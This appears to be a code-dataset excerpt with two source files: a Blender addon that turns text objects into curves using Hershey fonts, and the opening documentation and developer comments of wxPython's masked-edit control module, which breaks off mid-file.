e71eaed9117be7ba96c66bb470702e4c5a86beee | c6c988dfc41ba82d8b4da35be19ab9270ba465fb | /hershey_text.py | 66b3f38cefdbcf398d351a37a7b08524205b8b87 | [] | no_license | Tesla-Coil/blender-hershey-text | 55cd4d96dab6620be9503aecd00899010dbccc73 | 68d8188c4012b8de2dcc07e8532cb9f6e8a7f7de | refs/heads/master | 2020-03-27T03:44:40.440185 | 2017-04-15T09:26:26 | 2017-04-15T09:26:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,353 | py | #+
# This addon for Blender 2.7 uses the Hershey fonts to turn a text
# object into a collection of curves. Also needs HersheyPy
# <https://github.com/ldo/hersheypy> to be installed.
#
# Copyright 2015, 2017 Lawrence D'Oliveiro <ldo@geek-central.gen.nz>.
# Licensed under CC-BY-SA <http://creativecommons.org/licenses/by-sa/4.0/>.
#-
import math
import sys # debug
import os
import bpy
import mathutils
import hershey_font
bl_info = \
{
"name" : "Hershey Text",
"author" : "Lawrence D'Oliveiro <ldo@geek-central.gen.nz>",
"version" : (0, 5, 0),
"blender" : (2, 7, 8),
"location" : "View 3D > Object Mode > Tool Shelf",
"description" :
"Uses a Hershey font to turn a text object into a collection of curves.",
"warning" : "",
"wiki_url" : "",
"tracker_url" : "",
"category" : "Object",
}
class Failure(Exception) :
def __init__(self, msg) :
self.msg = msg
#end __init__
#end Failure
def list_hershey_fonts() :
result = [(" ", "(pick a font)", "")]
for item in hershey_font.each_name() :
result.append \
(
(item, item, "")
)
#end for
return \
sorted(result, key = lambda i : i[0])
#end list_hershey_fonts
class HersheyText(bpy.types.Operator) :
bl_idname = "text.hersheyfy"
bl_label = "Hershey Text"
bl_context = "objectmode"
bl_options = {"REGISTER", "UNDO"}
font_name = bpy.props.EnumProperty \
(
name = "Hershey Font",
description = "name of Hershey font to use",
items = list_hershey_fonts(),
)
curve_type = bpy.props.EnumProperty \
(
name = "Curve Type",
description = "type of curves to create",
items =
(
("POLY", "Poly", ""),
("BEZIER", "Bézier", ""),
# others seem to produce empty curves, disable for now
#("BSPLINE", "B-Spline", ""),
#("CARDINAL", "Cardinal", ""),
#("NURBS", "NURBS", ""),
),
default = "BEZIER",
)
sharp_angle = bpy.props.FloatProperty \
(
name = "Sharp Angle",
description = "Bézier curve angles below this become corners",
subtype = "ANGLE",
default = math.pi / 2,
)
delete_text = bpy.props.BoolProperty \
(
name = "Delete Original Text",
description = "delete the original text object",
default = False
)
@classmethod
def poll(celf, context) :
active_object = context.scene.objects.active
return \
(
context.mode == "OBJECT"
and
active_object != None
#and
# active_object.select
and
active_object.type in ("FONT", "CURVE")
)
#end poll
def draw(self, context) :
the_col = self.layout.column(align = True)
the_col.label("Hershey Font:")
the_col.prop(self, "font_name")
the_col.prop(self, "curve_type")
the_col.prop(self, "sharp_angle")
the_col.prop(self, "delete_text")
#end draw
def action_common(self, context, redoing) :
try :
if not redoing :
text_object = context.scene.objects.active
if text_object == None or not text_object.select :
raise Failure("no selected object")
#end if
if text_object.type != "FONT" or type(text_object.data) != bpy.types.TextCurve :
raise Failure("need to operate on a font object")
#end if
# save the name of the object so I can find it again
# when I'm reexecuted. Can't save a direct reference,
# as that is likely to become invalid. Blender guarantees
# the name is unique anyway.
self.orig_object_name = text_object.name
else :
text_object = context.scene.objects[self.orig_object_name]
assert text_object.type == "FONT" and type(text_object.data) == bpy.types.TextCurve
#end if
if self.font_name != " " :
the_font = hershey_font.HersheyGlyphs.load(self.font_name)
else :
the_font = None
#end if
curve_name = text_object.name + " hersh"
curve_data = bpy.data.curves.new(curve_name, "CURVE")
if the_font != None :
scaling = \
(
mathutils.Matrix.Scale
(
-1, # factor
4, # size
mathutils.Vector((0, 1, 0)), # axis
) # flip Y-axis
*
mathutils.Matrix.Scale
(
the_font.scale, # factor
4 # size
)
)
text_data = text_object.data
# TODO: text boxes, character formats
pos = mathutils.Vector((0, 0, 0))
for ch in text_data.body :
if the_font.encoding != None :
glyph_nr = the_font.encoding.get(ord(ch))
else :
glyph_nr = ord(ch)
#end if
if glyph_nr != None :
the_glyph = the_font.glyphs.get(glyph_nr)
else :
the_glyph = None
#end if
# note each new curve Spline already seems to have one point to begin with
if the_glyph != None :
glyph_width = the_glyph.max_x - the_glyph.min_x
for pathseg in the_glyph.path :
curve_spline = curve_data.splines.new(self.curve_type)
is_bezier = self.curve_type == "BEZIER"
points = (curve_spline.points, curve_spline.bezier_points)[is_bezier]
for i, point in enumerate(pathseg) :
if i != 0 :
points.add()
#end if
points[i].co = \
(
mathutils.Matrix.Scale
(
text_data.size, # factor
4, # size
)
*
mathutils.Matrix.Shear
(
"XZ" , # plane
4, # size
[text_data.shear, 0], # factor
)
*
mathutils.Matrix.Translation(pos)
*
scaling
*
mathutils.Vector((point.x, point.y - the_font.baseline_y, 0))
).resized((4, 3)[is_bezier])
#end for
if is_bezier :
sharp_angle = self.sharp_angle
for i in range(len(pathseg)) :
try :
angle = \
(
(points[(i + 1) % len(pathseg)].co - points[i].co)
.angle
(points[i].co - points[(i - 1) % len(pathseg)].co)
)
except ValueError :
# assume zero-length vector somewhere
angle = 0
#end if
angle = math.pi - angle
if angle < sharp_angle :
# make it a corner
points[i].handle_left_type = "FREE"
points[i].handle_right_type = "FREE"
points[i].handle_left = points[i].co
points[i].handle_right = points[i].co
else :
# make it curve
points[i].handle_left_type = "AUTO"
points[i].handle_right_type = "AUTO"
#end if
#end for
#end if
#end for
else :
glyph_width = the_font.max.x - the_font.min.x
curve_spline = curve_data.splines.new("POLY")
curve_spline.points.add(3)
for i, corner_x, corner_y in \
(
(0, the_font.min.x, the_font.min.y),
(1, the_font.max.x, the_font.min.y),
(2, the_font.max.x, the_font.max.y),
(3, the_font.min.x, the_font.max.y),
) \
:
curve_spline.points[i].co = \
(
mathutils.Matrix.Translation(pos)
*
scaling
*
mathutils.Vector((corner_x, corner_y - the_font.baseline_y, 0))
).resized(4)
#end for
curve_spline.use_cyclic_u = True
#end if
pos += mathutils.Vector((glyph_width * the_font.scale, 0, 0))
#end for
#end if
curve_obj = bpy.data.objects.new(curve_name, curve_data)
context.scene.objects.link(curve_obj)
curve_obj.matrix_local = text_object.matrix_local
bpy.ops.object.select_all(action = "DESELECT")
bpy.data.objects[curve_name].select = True
context.scene.objects.active = curve_obj
if self.delete_text :
context.scene.objects.unlink(text_object)
bpy.data.objects.remove(text_object)
#end if
# all done
status = {"FINISHED"}
except Failure as why :
sys.stderr.write("Failure: {}\n".format(why.msg)) # debug
self.report({"ERROR"}, why.msg)
status = {"CANCELLED"}
#end try
return \
status
#end action_common
def execute(self, context) :
return \
self.action_common(context, True)
#end execute
def invoke(self, context, event) :
return \
self.action_common(context, False)
#end invoke
#end HersheyText
def add_invoke_button(self, context) :
if HersheyText.poll(context) :
the_col = self.layout.column(align = True) # gives a nicer grouping of my items
the_col.label("Hersheyfy:")
the_col.operator(HersheyText.bl_idname, text = "Do It")
#end if
#end add_invoke_button
def register() :
bpy.utils.register_module(__name__)
bpy.types.VIEW3D_PT_tools_object.append(add_invoke_button)
#end register
def unregister() :
bpy.utils.unregister_module(__name__)
bpy.types.VIEW3D_PT_tools_object.remove(add_invoke_button)
#end unregister
if __name__ == "__main__" :
register()
#end if
| [
"ldo@geek-central.gen.nz"
] | ldo@geek-central.gen.nz |
740076bd72d210a9f6c56fbb3ea2285ea4ce1f16 | dca653bb975528bd1b8ab2547f6ef4f48e15b7b7 | /tags/wxPy-2.8.10.1/wxPython/wx/lib/masked/maskededit.py | e2b73b16794154fc23584bfb12edc07f6717afed | [] | no_license | czxxjtu/wxPython-1 | 51ca2f62ff6c01722e50742d1813f4be378c0517 | 6a7473c258ea4105f44e31d140ea5c0ae6bc46d8 | refs/heads/master | 2021-01-15T12:09:59.328778 | 2015-01-05T20:55:10 | 2015-01-05T20:55:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343,459 | py | #----------------------------------------------------------------------------
# Name: maskededit.py
# Authors: Will Sadkin, Jeff Childers
# Email: wsadkin@parlancecorp.com, jchilders_98@yahoo.com
# Created: 02/11/2003
# Copyright: (c) 2003 by Jeff Childers, Will Sadkin, 2003
# Portions: (c) 2002 by Will Sadkin, 2002-2007
# RCS-ID: $Id$
# License: wxWidgets license
#----------------------------------------------------------------------------
# NOTE:
# MaskedEdit controls are based on a suggestion made on [wxPython-Users] by
# Jason Hihn, and borrows liberally from Will Sadkin's original masked edit
# control for time entry, TimeCtrl (which is now rewritten using this
# control!).
#
# MaskedEdit controls do not normally use validators, because they do
# careful manipulation of the cursor in the text window on each keystroke,
# and validation is cursor-position specific, so the control intercepts the
# key codes before the validator would fire. However, validators can be
# provided to do data transfer to the controls.
#
#----------------------------------------------------------------------------
#
# This file now contains the bulk of the logic behind all masked controls,
# the MaskedEditMixin class, the Field class, and the autoformat codes.
#
#----------------------------------------------------------------------------
#
# 03/30/2004 - Will Sadkin (wsadkin@parlancecorp.com)
#
# o Split out TextCtrl, ComboBox and IpAddrCtrl into their own files,
# o Reorganized code into masked package
#
# 12/09/2003 - Jeff Grimmett (grimmtooth@softhome.net)
#
# o Updated for wx namespace. No guarantees. This is one huge file.
#
# 12/13/2003 - Jeff Grimmett (grimmtooth@softhome.net)
#
# o Missed wx.DateTime stuff earlier.
#
# 12/20/2003 - Jeff Grimmett (grimmtooth@softhome.net)
#
# o MaskedEditMixin -> MaskedEditMixin
# o wxMaskedTextCtrl -> maskedTextCtrl
# o wxMaskedComboBoxSelectEvent -> MaskedComboBoxSelectEvent
# o wxMaskedComboBox -> MaskedComboBox
# o wxIpAddrCtrl -> IpAddrCtrl
# o wxTimeCtrl -> TimeCtrl
#
__doc__ = """\
contains MaskedEditMixin class that drives all the other masked controls.
====================
Masked Edit Overview
====================
masked.TextCtrl:
is a sublassed text control that can carefully control the user's input
based on a mask string you provide.
General usage example::
control = masked.TextCtrl( win, -1, '', mask = '(###) ###-####')
The example above will create a text control that allows only numbers to be
entered and then only in the positions indicated in the mask by the # sign.
masked.ComboBox:
is a similar subclass of wxComboBox that allows the same sort of masking,
but also can do auto-complete of values, and can require the value typed
to be in the list of choices to be colored appropriately.
masked.Ctrl:
is actually a factory function for several types of masked edit controls:
================= ==================================================
masked.TextCtrl standard masked edit text box
masked.ComboBox adds combobox capabilities
masked.IpAddrCtrl adds special semantics for IP address entry
masked.TimeCtrl special subclass handling lots of types as values
masked.NumCtrl special subclass handling numeric values
================= ==================================================
It works by looking for a *controlType* parameter in the keyword
arguments of the control, to determine what kind of instance to return.
If not specified as a keyword argument, the default control type returned
will be masked.TextCtrl.
Each of the above classes has its own set of arguments, but masked.Ctrl
provides a single "unified" interface for masked controls.
What follows is a description of how to configure the generic masked.TextCtrl
and masked.ComboBox; masked.NumCtrl and masked.TimeCtrl have their own demo
pages and interface descriptions.
=========================
Initialization Parameters
-------------------------
mask
Allowed mask characters and function:
========= ==========================================================
Character Function
========= ==========================================================
# Allow numeric only (0-9)
N Allow letters and numbers (0-9)
A Allow uppercase letters only
a Allow lowercase letters only
C Allow any letter, upper or lower
X Allow string.letters, string.punctuation, string.digits
& Allow string.punctuation only (doesn't include all unicode symbols)
\* Allow any visible character
| explicit field boundary (takes no space in the control; allows mix
of adjacent mask characters to be treated as separate fields,
eg: '&|###' means "field 0 = '&', field 1 = '###'", but there's
no fixed characters in between.
========= ==========================================================
These controls define these sets of characters using string.letters,
string.uppercase, etc. These sets are affected by the system locale
setting, so in order to have the masked controls accept characters
that are specific to your users' language, your application should
set the locale.
For example, to allow international characters to be used in the
above masks, you can place the following in your code as part of
your application's initialization code::
import locale
locale.setlocale(locale.LC_ALL, '')
The controls now also support (by popular demand) all "visible" characters,
by use of the * mask character, including unicode characters above
the standard ANSI keycode range.
Note: As string.punctuation doesn't typically include all unicode
symbols, you will have to use includechars to get some of these into
otherwise restricted positions in your control, such as those specified
with &.
Using these mask characters, a variety of template masks can be built. See
the demo for some other common examples include date+time, social security
number, etc. If any of these characters are needed as template rather
than mask characters, they can be escaped with \, ie. \N means "literal N".
(use \\ for literal backslash, as in: r'CCC\\NNN'.)
*Note:*
Masks containing only # characters and one optional decimal point
character are handled specially, as "numeric" controls. Such
controls have special handling for typing the '-' key, handling
the "decimal point" character as truncating the integer portion,
optionally allowing grouping characters and so forth.
There are several parameters and format codes that only make sense
when combined with such masks, eg. groupChar, decimalChar, and so
forth (see below). These allow you to construct reasonable
numeric entry controls.
*Note:*
Changing the mask for a control deletes any previous field classes
(and any associated validation or formatting constraints) for them.
useFixedWidthFont
By default, masked edit controls use a fixed width font, so that
the mask characters are fixed within the control, regardless of
subsequent modifications to the value. Set to False if having
the control font be the same as other controls is required. (This is
a control-level parameter.)
defaultEncoding
(Applies to unicode systems only) By default, the default unicode encoding
used is latin1, or iso-8859-1. If necessary, you can set this control-level
parameter to govern the codec used to decode your keyboard inputs.
(This is a control-level parameter.)
formatcodes
These other properties can be passed to the class when instantiating it:
Formatcodes are specified as a string of single character formatting
codes that modify behavior of the control::
_ Allow spaces
! Force upper
^ Force lower
R Right-align field(s)
r Right-insert in field(s) (implies R)
< Stay in field until explicit navigation out of it
> Allow insert/delete within partially filled fields (as
opposed to the default "overwrite" mode for fixed-width
masked edit controls.) This allows single-field controls
or each field within a multi-field control to optionally
behave more like standard text controls.
(See EMAIL or phone number autoformat examples.)
*Note: This also governs whether backspace/delete operations
shift contents of field to right of cursor, or just blank the
erased section.
Also, when combined with 'r', this indicates that the field
or control allows right insert anywhere within the current
non-empty value in the field. (Otherwise right-insert behavior
is only performed to when the entire right-insertable field is
selected or the cursor is at the right edge of the field.*
, Allow grouping character in integer fields of numeric controls
and auto-group/regroup digits (if the result fits) when leaving
such a field. (If specified, .SetValue() will attempt to
auto-group as well.)
',' is also the default grouping character. To change the
grouping character and/or decimal character, use the groupChar
and decimalChar parameters, respectively.
Note: typing the "decimal point" character in such fields will
clip the value to that left of the cursor for integer
fields of controls with "integer" or "floating point" masks.
If the ',' format code is specified, this will also cause the
resulting digits to be regrouped properly, using the current
grouping character.
- Prepend and reserve leading space for sign to mask and allow
signed values (negative #s shown in red by default.) Can be
used with argument useParensForNegatives (see below.)
0 integer fields get leading zeros
D Date[/time] field
T Time field
F Auto-Fit: the control calculates its size from
the length of the template mask
V validate entered chars against validRegex before allowing them
to be entered vs. being allowed by basic mask and then having
the resulting value just colored as invalid.
(See USSTATE autoformat demo for how this can be used.)
S select entire field when navigating to new field
fillChar
defaultValue
These controls have two options for the initial state of the control.
If a blank control with just the non-editable characters showing
is desired, simply leave the constructor variable fillChar as its
default (' '). If you want some other character there, simply
change the fillChar to that value. Note: changing the control's fillChar
will implicitly reset all of the fields' fillChars to this value.
If you need different default characters in each mask position,
you can specify a defaultValue parameter in the constructor, or
set them for each field individually.
This value must satisfy the non-editable characters of the mask,
but need not conform to the replaceable characters.
groupChar
decimalChar
These parameters govern what character is used to group numbers
and is used to indicate the decimal point for numeric format controls.
The default groupChar is ',', the default decimalChar is '.'
By changing these, you can customize the presentation of numbers
for your location.
Eg::
formatcodes = ',', groupChar='\'' allows 12'345.34
formatcodes = ',', groupChar='.', decimalChar=',' allows 12.345,34
(These are control-level parameters.)
shiftDecimalChar
The default "shiftDecimalChar" (used for "backwards-tabbing" until
shift-tab is fixed in wxPython) is '>' (for QWERTY keyboards.) for
other keyboards, you may want to customize this, eg '?' for shift ',' on
AZERTY keyboards, ':' or ';' for other European keyboards, etc.
(This is a control-level parameter.)
useParensForNegatives=False
This option can be used with signed numeric format controls to
indicate signs via () rather than '-'.
(This is a control-level parameter.)
autoSelect=False
This option can be used to have a field or the control try to
auto-complete on each keystroke if choices have been specified.
autoCompleteKeycodes=[]
By default, DownArrow, PageUp and PageDown will auto-complete a
partially entered field. Shift-DownArrow, Shift-UpArrow, PageUp
and PageDown will also auto-complete, but if the field already
contains a matched value, these keys will cycle through the list
of choices forward or backward as appropriate. Shift-Up and
Shift-Down also take you to the next/previous field after any
auto-complete action.
Additional auto-complete keys can be specified via this parameter.
Any keys so specified will act like PageDown.
(This is a control-level parameter.)
Validating User Input
=====================
There are a variety of initialization parameters that are used to validate
user input. These parameters can apply to the control as a whole, and/or
to individual fields:
===================== ==================================================================
excludeChars A string of characters to exclude even if otherwise allowed
includeChars A string of characters to allow even if otherwise disallowed
validRegex Use a regular expression to validate the contents of the text box
validRange Pass a range as a list (low,high) to limit numeric fields/values
choices A list of strings that are allowed choices for the control.
choiceRequired value must be member of choices list
compareNoCase Perform case-insensitive matching when validating against list
*Note: for masked.ComboBox, this defaults to True.*
emptyInvalid Boolean indicating whether an empty value should be considered
invalid
validFunc A function to call of the form: bool = func(candidate_value)
which will return True if the candidate_value satisfies some
external criteria for the control in addition to the
other validation, or False if not. (This validation is
applied last in the chain of validations.)
validRequired Boolean indicating whether or not keys that are allowed by the
mask, but result in an invalid value are allowed to be entered
into the control. Setting this to True implies that a valid
default value is set for the control.
retainFieldValidation False by default; if True, this allows individual fields to
retain their own validation constraints independently of any
subsequent changes to the control's overall parameters.
(This is a control-level parameter.)
validator Validators are not normally needed for masked controls, because
of the nature of the validation and control of input. However,
you can supply one to provide data transfer routines for the
controls.
raiseOnInvalidPaste False by default; normally a bad paste simply is ignored with a bell;
if True, this will cause a ValueError exception to be thrown,
with the .value attribute of the exception containing the bad value.
stopFieldChangeIfInvalid
False by default; tries to prevent navigation out of a field if its
current value is invalid. Can be used to create a hybrid of validation
settings, allowing intermediate invalid values in a field without
sacrificing ability to limit values as with validRequired.
NOTE: It is possible to end up with an invalid value when using
this option if focus is switched to some other control via mousing.
To avoid this, consider deriving a class that defines _LostFocus()
function that returns the control to a valid value when the focus
shifts. (AFAICT, The change in focus is unpreventable.)
===================== =================================================================
Coloring Behavior
=================
The following parameters have been provided to allow you to change the default
coloring behavior of the control. These can be set at construction, or via
the .SetCtrlParameters() function. Pass a color as string e.g. 'Yellow':
======================== =======================================================================
emptyBackgroundColour Control Background color when identified as empty. Default=White
invalidBackgroundColour Control Background color when identified as Not valid. Default=Yellow
validBackgroundColour Control Background color when identified as Valid. Default=white
======================== =======================================================================
The following parameters control the default foreground color coloring behavior of the
control. Pass a color as string e.g. 'Yellow':
======================== ======================================================================
foregroundColour Control foreground color when value is not negative. Default=Black
signedForegroundColour Control foreground color when value is negative. Default=Red
======================== ======================================================================
Fields
======
Each part of the mask that allows user input is considered a field. The fields
are represented by their own class instances. You can specify field-specific
constraints by constructing or accessing the field instances for the control
and then specifying those constraints via parameters.
fields
This parameter allows you to specify Field instances containing
constraints for the individual fields of a control, eg: local
choice lists, validation rules, functions, regexps, etc.
It can be either an ordered list or a dictionary. If a list,
the fields will be applied as fields 0, 1, 2, etc.
If a dictionary, it should be keyed by field index.
the values should be a instances of maskededit.Field.
Any field not represented by the list or dictionary will be
implicitly created by the control.
Eg::
fields = [ Field(formatcodes='_r'), Field('choices=['a', 'b', 'c']) ]
Or::
fields = {
1: ( Field(formatcodes='_R', choices=['a', 'b', 'c']),
3: ( Field(choices=['01', '02', '03'], choiceRequired=True)
}
The following parameters are available for individual fields, with the
same semantics as for the whole control but applied to the field in question:
============== =============================================================================
fillChar if set for a field, it will override the control's fillChar for that field
groupChar if set for a field, it will override the control's default
defaultValue sets field-specific default value; overrides any default from control
compareNoCase overrides control's settings
emptyInvalid determines whether field is required to be filled at all times
validRequired if set, requires field to contain valid value
============== =============================================================================
If any of the above parameters are subsequently specified for the control as a
whole, that new value will be propagated to each field, unless the
retainFieldValidation control-level parameter is set.
============== ==============================
formatcodes Augments control's settings
excludeChars ' ' '
includeChars ' ' '
validRegex ' ' '
validRange ' ' '
choices ' ' '
choiceRequired ' ' '
validFunc ' ' '
============== ==============================
Control Class Functions
=======================
.GetPlainValue(value=None)
Returns the value specified (or the control's text value
if not specified) without the formatting text.
In the example above, might return phone no='3522640075',
whereas control.GetValue() would return '(352) 264-0075'
.ClearValue()
Returns the control's value to its default, and places the
cursor at the beginning of the control.
.SetValue()
Does "smart replacement" of passed value into the control, as does
the .Paste() method. As with other text entry controls, the
.SetValue() text replacement begins at left-edge of the control,
with missing mask characters inserted as appropriate.
.SetValue will also adjust integer, float or date mask entry values,
adding commas, auto-completing years, etc. as appropriate.
For "right-aligned" numeric controls, it will also now automatically
right-adjust any value whose length is less than the width of the
control before attempting to set the value.
If a value does not follow the format of the control's mask, or will
not fit into the control, a ValueError exception will be raised.
Eg::
mask = '(###) ###-####'
.SetValue('1234567890') => '(123) 456-7890'
.SetValue('(123)4567890') => '(123) 456-7890'
.SetValue('(123)456-7890') => '(123) 456-7890'
.SetValue('123/4567-890') => illegal paste; ValueError
mask = '#{6}.#{2}', formatcodes = '_,-',
.SetValue('111') => ' 111 . '
.SetValue(' %9.2f' % -111.12345 ) => ' -111.12'
.SetValue(' %9.2f' % 1234.00 ) => ' 1,234.00'
.SetValue(' %9.2f' % -1234567.12345 ) => insufficient room; ValueError
mask = '#{6}.#{2}', formatcodes = '_,-R' # will right-adjust value for right-aligned control
.SetValue('111') => padded value misalignment ValueError: " 111" will not fit
.SetValue('%.2f' % 111 ) => ' 111.00'
.SetValue('%.2f' % -111.12345 ) => ' -111.12'
.IsValid(value=None)
Returns True if the value specified (or the value of the control
if not specified) passes validation tests
.IsEmpty(value=None)
Returns True if the value specified (or the value of the control
if not specified) is equal to an "empty value," ie. all
editable characters == the fillChar for their respective fields.
.IsDefault(value=None)
Returns True if the value specified (or the value of the control
if not specified) is equal to the initial value of the control.
.Refresh()
Recolors the control as appropriate to its current settings.
.SetCtrlParameters(\*\*kwargs)
This function allows you to set up and/or change the control parameters
after construction; it takes a list of key/value pairs as arguments,
where the keys can be any of the mask-specific parameters in the constructor.
Eg::
ctl = masked.TextCtrl( self, -1 )
ctl.SetCtrlParameters( mask='###-####',
defaultValue='555-1212',
formatcodes='F')
.GetCtrlParameter(parametername)
This function allows you to retrieve the current value of a parameter
from the control.
*Note:* Each of the control parameters can also be set using its
own Set and Get function. These functions follow a regular form:
All of the parameter names start with lower case; for their
corresponding Set/Get function, the parameter name is capitalized.
Eg::
ctl.SetMask('###-####')
ctl.SetDefaultValue('555-1212')
ctl.GetChoiceRequired()
ctl.GetFormatcodes()
*Note:* After any change in parameters, the choices for the
control are reevaluated to ensure that they are still legal. If you
have large choice lists, it is therefore more efficient to set parameters
before setting the choices available.
.SetFieldParameters(field_index, \*\*kwargs)
This function allows you to specify change individual field
parameters after construction. (Indices are 0-based.)
.GetFieldParameter(field_index, parametername)
Allows the retrieval of field parameters after construction
The control detects certain common constructions. In order to use the signed feature
(negative numbers and coloring), the mask has to be all numbers with optionally one
decimal point. Without a decimal (e.g. '######'), the control will treat it as an integer
value. With a decimal (e.g. '###.##'), the control will act as a floating point control
(i.e. press decimal to 'tab' to the decimal position). Pressing decimal in the
integer control truncates the value. However, for a true numeric control,
masked.NumCtrl provides all this, and true numeric input/output support as well.
Check your controls by calling each control's .IsValid() function and the
.IsEmpty() function to determine which controls have been a) filled in and
b) filled in properly.
Regular expression validations can be used flexibly and creatively.
Take a look at the demo; the zip-code validation succeeds as long as the
first five numerals are entered. the last four are optional, but if
any are entered, there must be 4 to be valid.
masked.Ctrl Configuration
=========================
masked.Ctrl works by looking for a special *controlType*
parameter in the variable arguments of the control, to determine
what kind of instance to return.
controlType can be one of::
controlTypes.TEXT
controlTypes.COMBO
controlTypes.IPADDR
controlTypes.TIME
controlTypes.NUMBER
These constants are also available individually, ie, you can
use either of the following::
from wxPython.wx.lib.masked import MaskedCtrl, controlTypes
from wxPython.wx.lib.masked import MaskedCtrl, COMBO, TEXT, NUMBER, IPADDR
If not specified as a keyword argument, the default controlType is
controlTypes.TEXT.
"""
"""
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
DEVELOPER COMMENTS:
Naming Conventions
------------------
All methods of the Mixin that are not meant to be exposed to the external
interface are prefaced with '_'. Those functions that are primarily
intended to be internal subroutines subsequently start with a lower-case
letter; those that are primarily intended to be used and/or overridden
by derived subclasses start with a capital letter.
The following methods must be used and/or defined when deriving a control
from MaskedEditMixin. NOTE: if deriving from a *masked edit* control
(eg. class IpAddrCtrl(masked.TextCtrl) ), then this is NOT necessary,
as it's already been done for you in the base class.
._SetInitialValue()
This function must be called after the associated base
control has been initialized in the subclass __init__
function. It sets the initial value of the control,
either to the value specified if non-empty, the
default value if specified, or the "template" for
the empty control as necessary. It will also set/reset
the font if necessary and apply formatting to the
control at this time.
._GetSelection()
REQUIRED
Each class derived from MaskedEditMixin must define
the function for getting the start and end of the
current text selection. The reason for this is
that not all controls have the same function name for
doing this; eg. wx.TextCtrl uses .GetSelection(),
whereas we had to write a .GetMark() function for
wxComboBox, because .GetSelection() for the control
gets the currently selected list item from the combo
box, and the control doesn't (yet) natively provide
a means of determining the text selection.
._SetSelection()
REQUIRED
Similarly to _GetSelection, each class derived from
MaskedEditMixin must define the function for setting
the start and end of the current text selection.
(eg. .SetSelection() for masked.TextCtrl, and .SetMark() for
masked.ComboBox.
._GetInsertionPoint()
._SetInsertionPoint()
REQUIRED
For consistency, and because the mixin shouldn't rely
on fixed names for any manipulations it does of any of
the base controls, we require each class derived from
MaskedEditMixin to define these functions as well.
._GetValue()
._SetValue() REQUIRED
Each class derived from MaskedEditMixin must define
the functions used to get and set the raw value of the
control.
This is necessary so that recursion doesn't take place
when setting the value, and so that the mixin can
call the appropriate function after doing all its
validation and manipulation without knowing what kind
of base control it was mixed in with. To handle undo
functionality, the ._SetValue() must record the current
selection prior to setting the value.
.Cut()
.Paste()
.Undo()
.SetValue() REQUIRED
Each class derived from MaskedEditMixin must redefine
these functions to call the _Cut(), _Paste(), _Undo()
and _SetValue() methods, respectively for the control,
so as to prevent programmatic corruption of the control's
value. This must be done in each derivation, as the
mixin cannot itself override a member of a sibling class.
._Refresh() REQUIRED
Each class derived from MaskedEditMixin must define
the function used to refresh the base control.
.Refresh() REQUIRED
Each class derived from MaskedEditMixin must redefine
this function so that it checks the validity of the
control (via self._CheckValid) and then refreshes
control using the base class method.
._IsEditable() REQUIRED
Each class derived from MaskedEditMixin must define
the function used to determine if the base control is
editable or not. (For masked.ComboBox, this has to
be done with code, rather than specifying the proper
function in the base control, as there isn't one...)
._CalcSize() REQUIRED
Each class derived from MaskedEditMixin must define
the function used to determine how wide the control
should be given the mask. (The mixin function
._calcSize() provides a baseline estimate.)
Event Handling
--------------
Event handlers are "chained", and MaskedEditMixin usually
swallows most of the events it sees, thereby preventing any other
handlers from firing in the chain. It is therefore required that
each class derivation using the mixin to have an option to hook up
the event handlers itself or forego this operation and let a
subclass of the masked control do so. For this reason, each
subclass should probably include the following code:
if setupEventHandling:
## Setup event handlers
EVT_SET_FOCUS( self, self._OnFocus ) ## defeat automatic full selection
EVT_KILL_FOCUS( self, self._OnKillFocus ) ## run internal validator
EVT_LEFT_DCLICK(self, self._OnDoubleClick) ## select field under cursor on dclick
EVT_RIGHT_UP(self, self._OnContextMenu ) ## bring up an appropriate context menu
EVT_KEY_DOWN( self, self._OnKeyDown ) ## capture control events not normally seen, eg ctrl-tab.
EVT_CHAR( self, self._OnChar ) ## handle each keypress
EVT_TEXT( self, self.GetId(), self._OnTextChange ) ## color control appropriately & keep
## track of previous value for undo
where setupEventHandling is an argument to its constructor.
These 5 handlers must be "wired up" for the masked edit
controls to provide default behavior. (The setupEventHandling
is an argument to masked.TextCtrl and masked.ComboBox, so
that controls derived from *them* may replace one of these
handlers if they so choose.)
If your derived control wants to preprocess events before
taking action, it should then set up the event handling itself,
so it can be first in the event handler chain.
The following routines are available to facilitate changing
the default behavior of masked edit controls:
._SetKeycodeHandler(keycode, func)
._SetKeyHandler(char, func)
Use to replace default handling for any given keycode.
func should take the key event as argument and return
False if no further action is required to handle the
key. Eg:
self._SetKeycodeHandler(WXK_UP, self.IncrementValue)
self._SetKeyHandler('-', self._OnChangeSign)
(Setting a func of None removes any keyhandler for the given key.)
"Navigation" keys are assumed to change the cursor position, and
therefore don't cause automatic motion of the cursor as insertable
characters do.
._AddNavKeycode(keycode, handler=None)
._AddNavKey(char, handler=None)
Allows controls to specify other keys (and optional handlers)
to be treated as navigational characters. (eg. '.' in IpAddrCtrl)
._GetNavKeycodes() Returns the current list of navigational keycodes.
._SetNavKeycodes(key_func_tuples)
Allows replacement of the current list of keycodes
processed as navigation keys, and bind associated
optional keyhandlers. argument is a list of key/handler
tuples. Passing a value of None for the handler in a
given tuple indicates that default processing for the key
is desired.
._FindField(pos) Returns the Field object associated with this position
in the control.
._FindFieldExtent(pos, getslice=False, value=None)
Returns edit_start, edit_end of the field corresponding
to the specified position within the control, and
optionally also returns the current contents of that field.
If value is specified, it will retrieve the slice the corresponding
slice from that value, rather than the current value of the
control.
._AdjustField(pos)
This is the function that gets called for a given position
whenever the cursor is adjusted to leave a given field.
By default, it adjusts the year in date fields if mask is a date,
It can be overridden by a derived class to
adjust the value of the control at that time.
(eg. IpAddrCtrl reformats the address in this way.)
._Change() Called by internal EVT_TEXT handler. Return False to force
skip of the normal class change event.
._Keypress(key) Called by internal EVT_CHAR handler. Return False to force
skip of the normal class keypress event.
._LostFocus() Called by internal EVT_KILL_FOCUS handler
._OnKeyDown(event)
This is the default EVT_KEY_DOWN routine; it just checks for
"navigation keys", and if event.ControlDown(), it fires the
mixin's _OnChar() routine, as such events are not always seen
by the "cooked" EVT_CHAR routine.
._OnChar(event) This is the main EVT_CHAR handler for the
MaskedEditMixin.
The following routines are used to handle standard actions
for control keys:
_OnArrow(event) used for arrow navigation events
_OnCtrl_A(event) 'select all'
_OnCtrl_C(event) 'copy' (uses base control function, as copy is non-destructive)
_OnCtrl_S(event) 'save' (does nothing)
_OnCtrl_V(event) 'paste' - calls _Paste() method, to do smart paste
